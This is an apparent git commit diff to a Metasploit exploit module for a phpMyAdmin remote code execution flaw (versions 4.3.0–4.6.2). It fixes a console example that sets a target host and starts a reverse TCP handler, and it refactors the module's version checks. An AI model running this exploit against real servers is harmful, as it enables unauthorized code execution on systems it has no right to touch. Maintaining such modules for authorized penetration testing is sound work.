parent
122ea2ddcb
commit
2e2ded22fc
|
@ -41,7 +41,7 @@ msf5 > use exploit/multi/http/phpmyadmin_null_termination_exec
|
|||
msf5 exploit(multi/http/phpmyadmin_null_termination_exec) > set rhost 172.22.222.122
|
||||
rhost => 172.22.222.122
|
||||
msf5 exploit(multi/http/phpmyadmin_null_termination_exec) > set database <database>
|
||||
database => <bugtracker>
|
||||
database => <database>
|
||||
msf5 exploit(multi/http/phpmyadmin_null_termination_exec) > run
|
||||
|
||||
[*] Started reverse TCP handler on 172.22.222.177:4444
|
||||
|
|
|
@ -75,12 +75,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
if php_version
|
||||
vprint_status("#{peer} - PHP version: #{php_version}")
|
||||
|
||||
if php_version =~ /PHP\/(\d)\.(\d)\.(\d)/
|
||||
if $1.to_i > 5
|
||||
return Exploit::CheckCode::Safe
|
||||
elsif $1.to_i == 5 && $2.to_i > 4
|
||||
return Exploit::CheckCode::Safe
|
||||
elsif $1.to_i == 5 && $2.to_i == 4 && $3.to_i > 6
|
||||
if php_version =~ /PHP\/(\d+\.\d+\.\d+)/
|
||||
version = Gem::Version.new($1)
|
||||
vprint_status("#{peer} - PHP version: #{version.to_s}")
|
||||
if version > Gem::Version.new('5.4.6')
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
end
|
||||
|
@ -89,14 +87,13 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
# 4.3.0 - 4.6.2 authorized user RCE exploit
|
||||
if res.body =~ /pmaversion = '(\d)\.(\d)\.(.*)';/
|
||||
vprint_status("#{peer} - phpMyAdmin version: #{$1}.#{$2}.#{$3}")
|
||||
if res.body =~ /pmaversion = '(\d+\.\d+\.\d+)';/
|
||||
version = Gem::Version.new($1)
|
||||
vprint_status("#{peer} - phpMyAdmin version: #{version.to_s}")
|
||||
|
||||
if $1.to_i == 4 && $2.to_i > 2 && $2.to_i < 7
|
||||
unless $2.to_i == 6 && $3.to_i > 2
|
||||
if version >= Gem::Version.new('4.3.0') and version <= Gem::Version.new('4.6.2')
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
elsif $1.to_i < 4
|
||||
elsif version < Gem::Version.new('4.3.0')
|
||||
return Exploit::CheckCode::Detected
|
||||
end
|
||||
return Exploit::CheckCode::Safe
|
||||
|
|
Loading…
Reference in New Issue